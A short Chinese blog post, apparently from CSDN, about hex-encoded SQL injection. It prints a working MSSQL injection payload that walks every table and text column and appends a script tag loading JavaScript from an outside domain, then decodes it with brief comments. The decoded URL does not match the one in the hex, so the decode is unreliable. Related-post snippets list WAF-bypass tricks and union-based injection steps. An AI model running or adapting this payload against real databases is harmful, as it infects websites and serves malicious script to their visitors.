16进制 SQL注入

最新推荐文章于 2023-05-28 14:57:06 发布
原创 最新推荐文章于 2023-05-28 14:57:06 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #table #c #互联网

本文展示了一段用于在数据库中植入恶意脚本的SQL挂马代码,并对其进行了详细解析。该代码通过遍历数据库表更新特定字段的方式实现挂马目的。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72 eXeC(@s);

这个就是互联网泛滥的挂马专用代码,专门给过滤法的程序服务的。

把16进制翻译过来
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

看来原来的代码给16进制掩护得多少好。

zzxap
关注
SQL注入16进制转换工具
10-22
一款很好用的SQL注入16进制转换工具,大家可以试用一下
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
05-27 3810
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
16进制SQL 注入
zhuyx808的专栏
12-11 1366
通过post,get,cookies方式注入注入内容如下: DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032 003500350029002C00400043002000560061007200630068...
mysql 16 进制 注入_16进制 SQL注入
weixin_30093045的博客
01-28 1044
dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e...
SQL注入_16进制转换工具
09-10
SQL注入_16进制转换工具学习用,勿用其它商业用途啊!
进制sql注入是怎么实现的
最新发布
08-11
我们正在讨论二进制SQL注入的实现原理。根据用户提供的引用和之前的问题,我们需要解释二进制SQL注入如何工作,特别是它如何利用二进制数据来执行恶意SQL代码。 引用[1]提到:SQL注入是将恶意代码插入字符串并传递...
16进制转换工具 SQL注入学习小工具 学习
03-04
这个为"16进制转换工具 SQL注入学习小工具 学习"的压缩包显然是为那些想要深入理解SQL注入攻击和提升16进制转换能力的学习者准备的。下面我们将详细探讨这两个关键知识点。 首先,16进制(Hexadecimal)是一种逢...
SQL注入学习帮助小工具 16进制转换工具
04-23
本工具"SQL注入学习帮助小工具 16进制转换工具"正是针对这一主题设计的,旨在帮助学习者理解和防范这种攻击。 在进行SQL注入攻击时,16进制编码常被用来绕过过滤机制。因为许多过滤系统可能不会检测到16进制形式的...
iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过
mooyuan的网络安全博客
12-01 3145
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第11关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的11关增加了addslashes和get_magic_quotes_gpc函数,可以使用16进制编码的方式进行绕过。
mysql 16进制 绕过_sql注入绕过
weixin_39783633的博客
02-01 944
1.空格过滤绕过可用/**/制符(url编码为%09)换行符(%0a)括号反引号 代替空格mysql数据库有一个特性。在条件语句中,在 where id =1 后面加上 “=1”,成为where id =1 =1 ,就是对前面所有结果&1,查询的结果与原来一样。where id =1 =0 就是对于前面所有结果&0 ,查询的结果为除去原有查询结果的其他数据,输出的是除去1以外的...
mysql 16进制 注入,将十六进制值插入到mysql
weixin_29118723的博客
01-19 672
Can there any way to insert a hex value into MYSQL?I also want to be able to retreive it in hex form.For example, something like:INSERT INTO table ( hexTag )VALUES ( HEX(0x41) );And if I do this, I wa...
mysql 16进制 注入_将十六进制值插入到mysql
weixin_36416418的博客
01-19 653
Can there any way to insert a hex value into MYSQL?I also want to be able to retreive it in hex form.For example, something like:INSERT INTO table ( hexTag )VALUES ( HEX(0x41) );And if I do this, I wa...
limit 后注入_SQL注入中的WAF绕过技术
weixin_39932838的博客
11-26 253
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如或是...
sql注入方式
m0_69801663的博客
05-28 260
sql注入方式
【漏洞扫描】——15、Goby漏洞扫描工具
Fly_鹏程万里
03-01 1035
MYSQL注入流程(1)判断是否存在SQL注入 ' and 1=1 and 1=2(2)爆字段 order by 猜测的字段数(3)匹配字段 and 1=1 union select 1,2,3,......,n(4)获取显示字段and 1=2 union select 1,2,3,4......n(5)利用内置函数爆数据库信息 version() ...
SQL注入总结
KHOST的博客
11-29 838
SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。 可显注入 攻击者可以直接在当前界面内容中获取想要获得的内容。 报错注入 数据库查询返回结果并没有在页面中显示,但是应用程序将数据库报错信息打印到了页面中,所以攻击者可以构造数据库报错语句,从报错信息中获取想要获得的内容。 盲注 数据库查询结果无法从直观页面中获取,攻击者通过使用数据库逻辑或使数...
SQL 查询整型字段值和十六进制相互转换
flysh05的专栏
02-18 5746
数据库中存储是整型字段,有时展示需要转换为十六进制数据显示,这样就方便分析,例如MAC地址,固件版本信息。1. 使用CONVERT函数将整型数值转换为十六进制数据SELECT CONVERT(VARBINARY(8), 10) --0x0000000ASELECT CONVERT(VARBINARY(8), 100)  --0x00000064SELECT CONVERT(VARBINARY(8), 16777215) --0x00FFFFFF如上3条查询语句,将十进制数值10,100,16777
[基础+实战]SQL注入。注:我只是一个搬运工
g5703129的博客
11-20 522
看论坛。看到了一篇不错得文章,适合新手小白学习,总结的东西也挺全的。做笔记刚刚好。所以搬过来,分享给大家! MySQL注入函数 MySQL常用函数 MySQL内置的函数能够让我们更为快捷的得到想要的信息,操作字符串的函数也有助于在注入时绕过WAF。这里列举一些注入常用的函数。 1 2 3 4 5 6 7 8 9 10 11 select SYSTE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值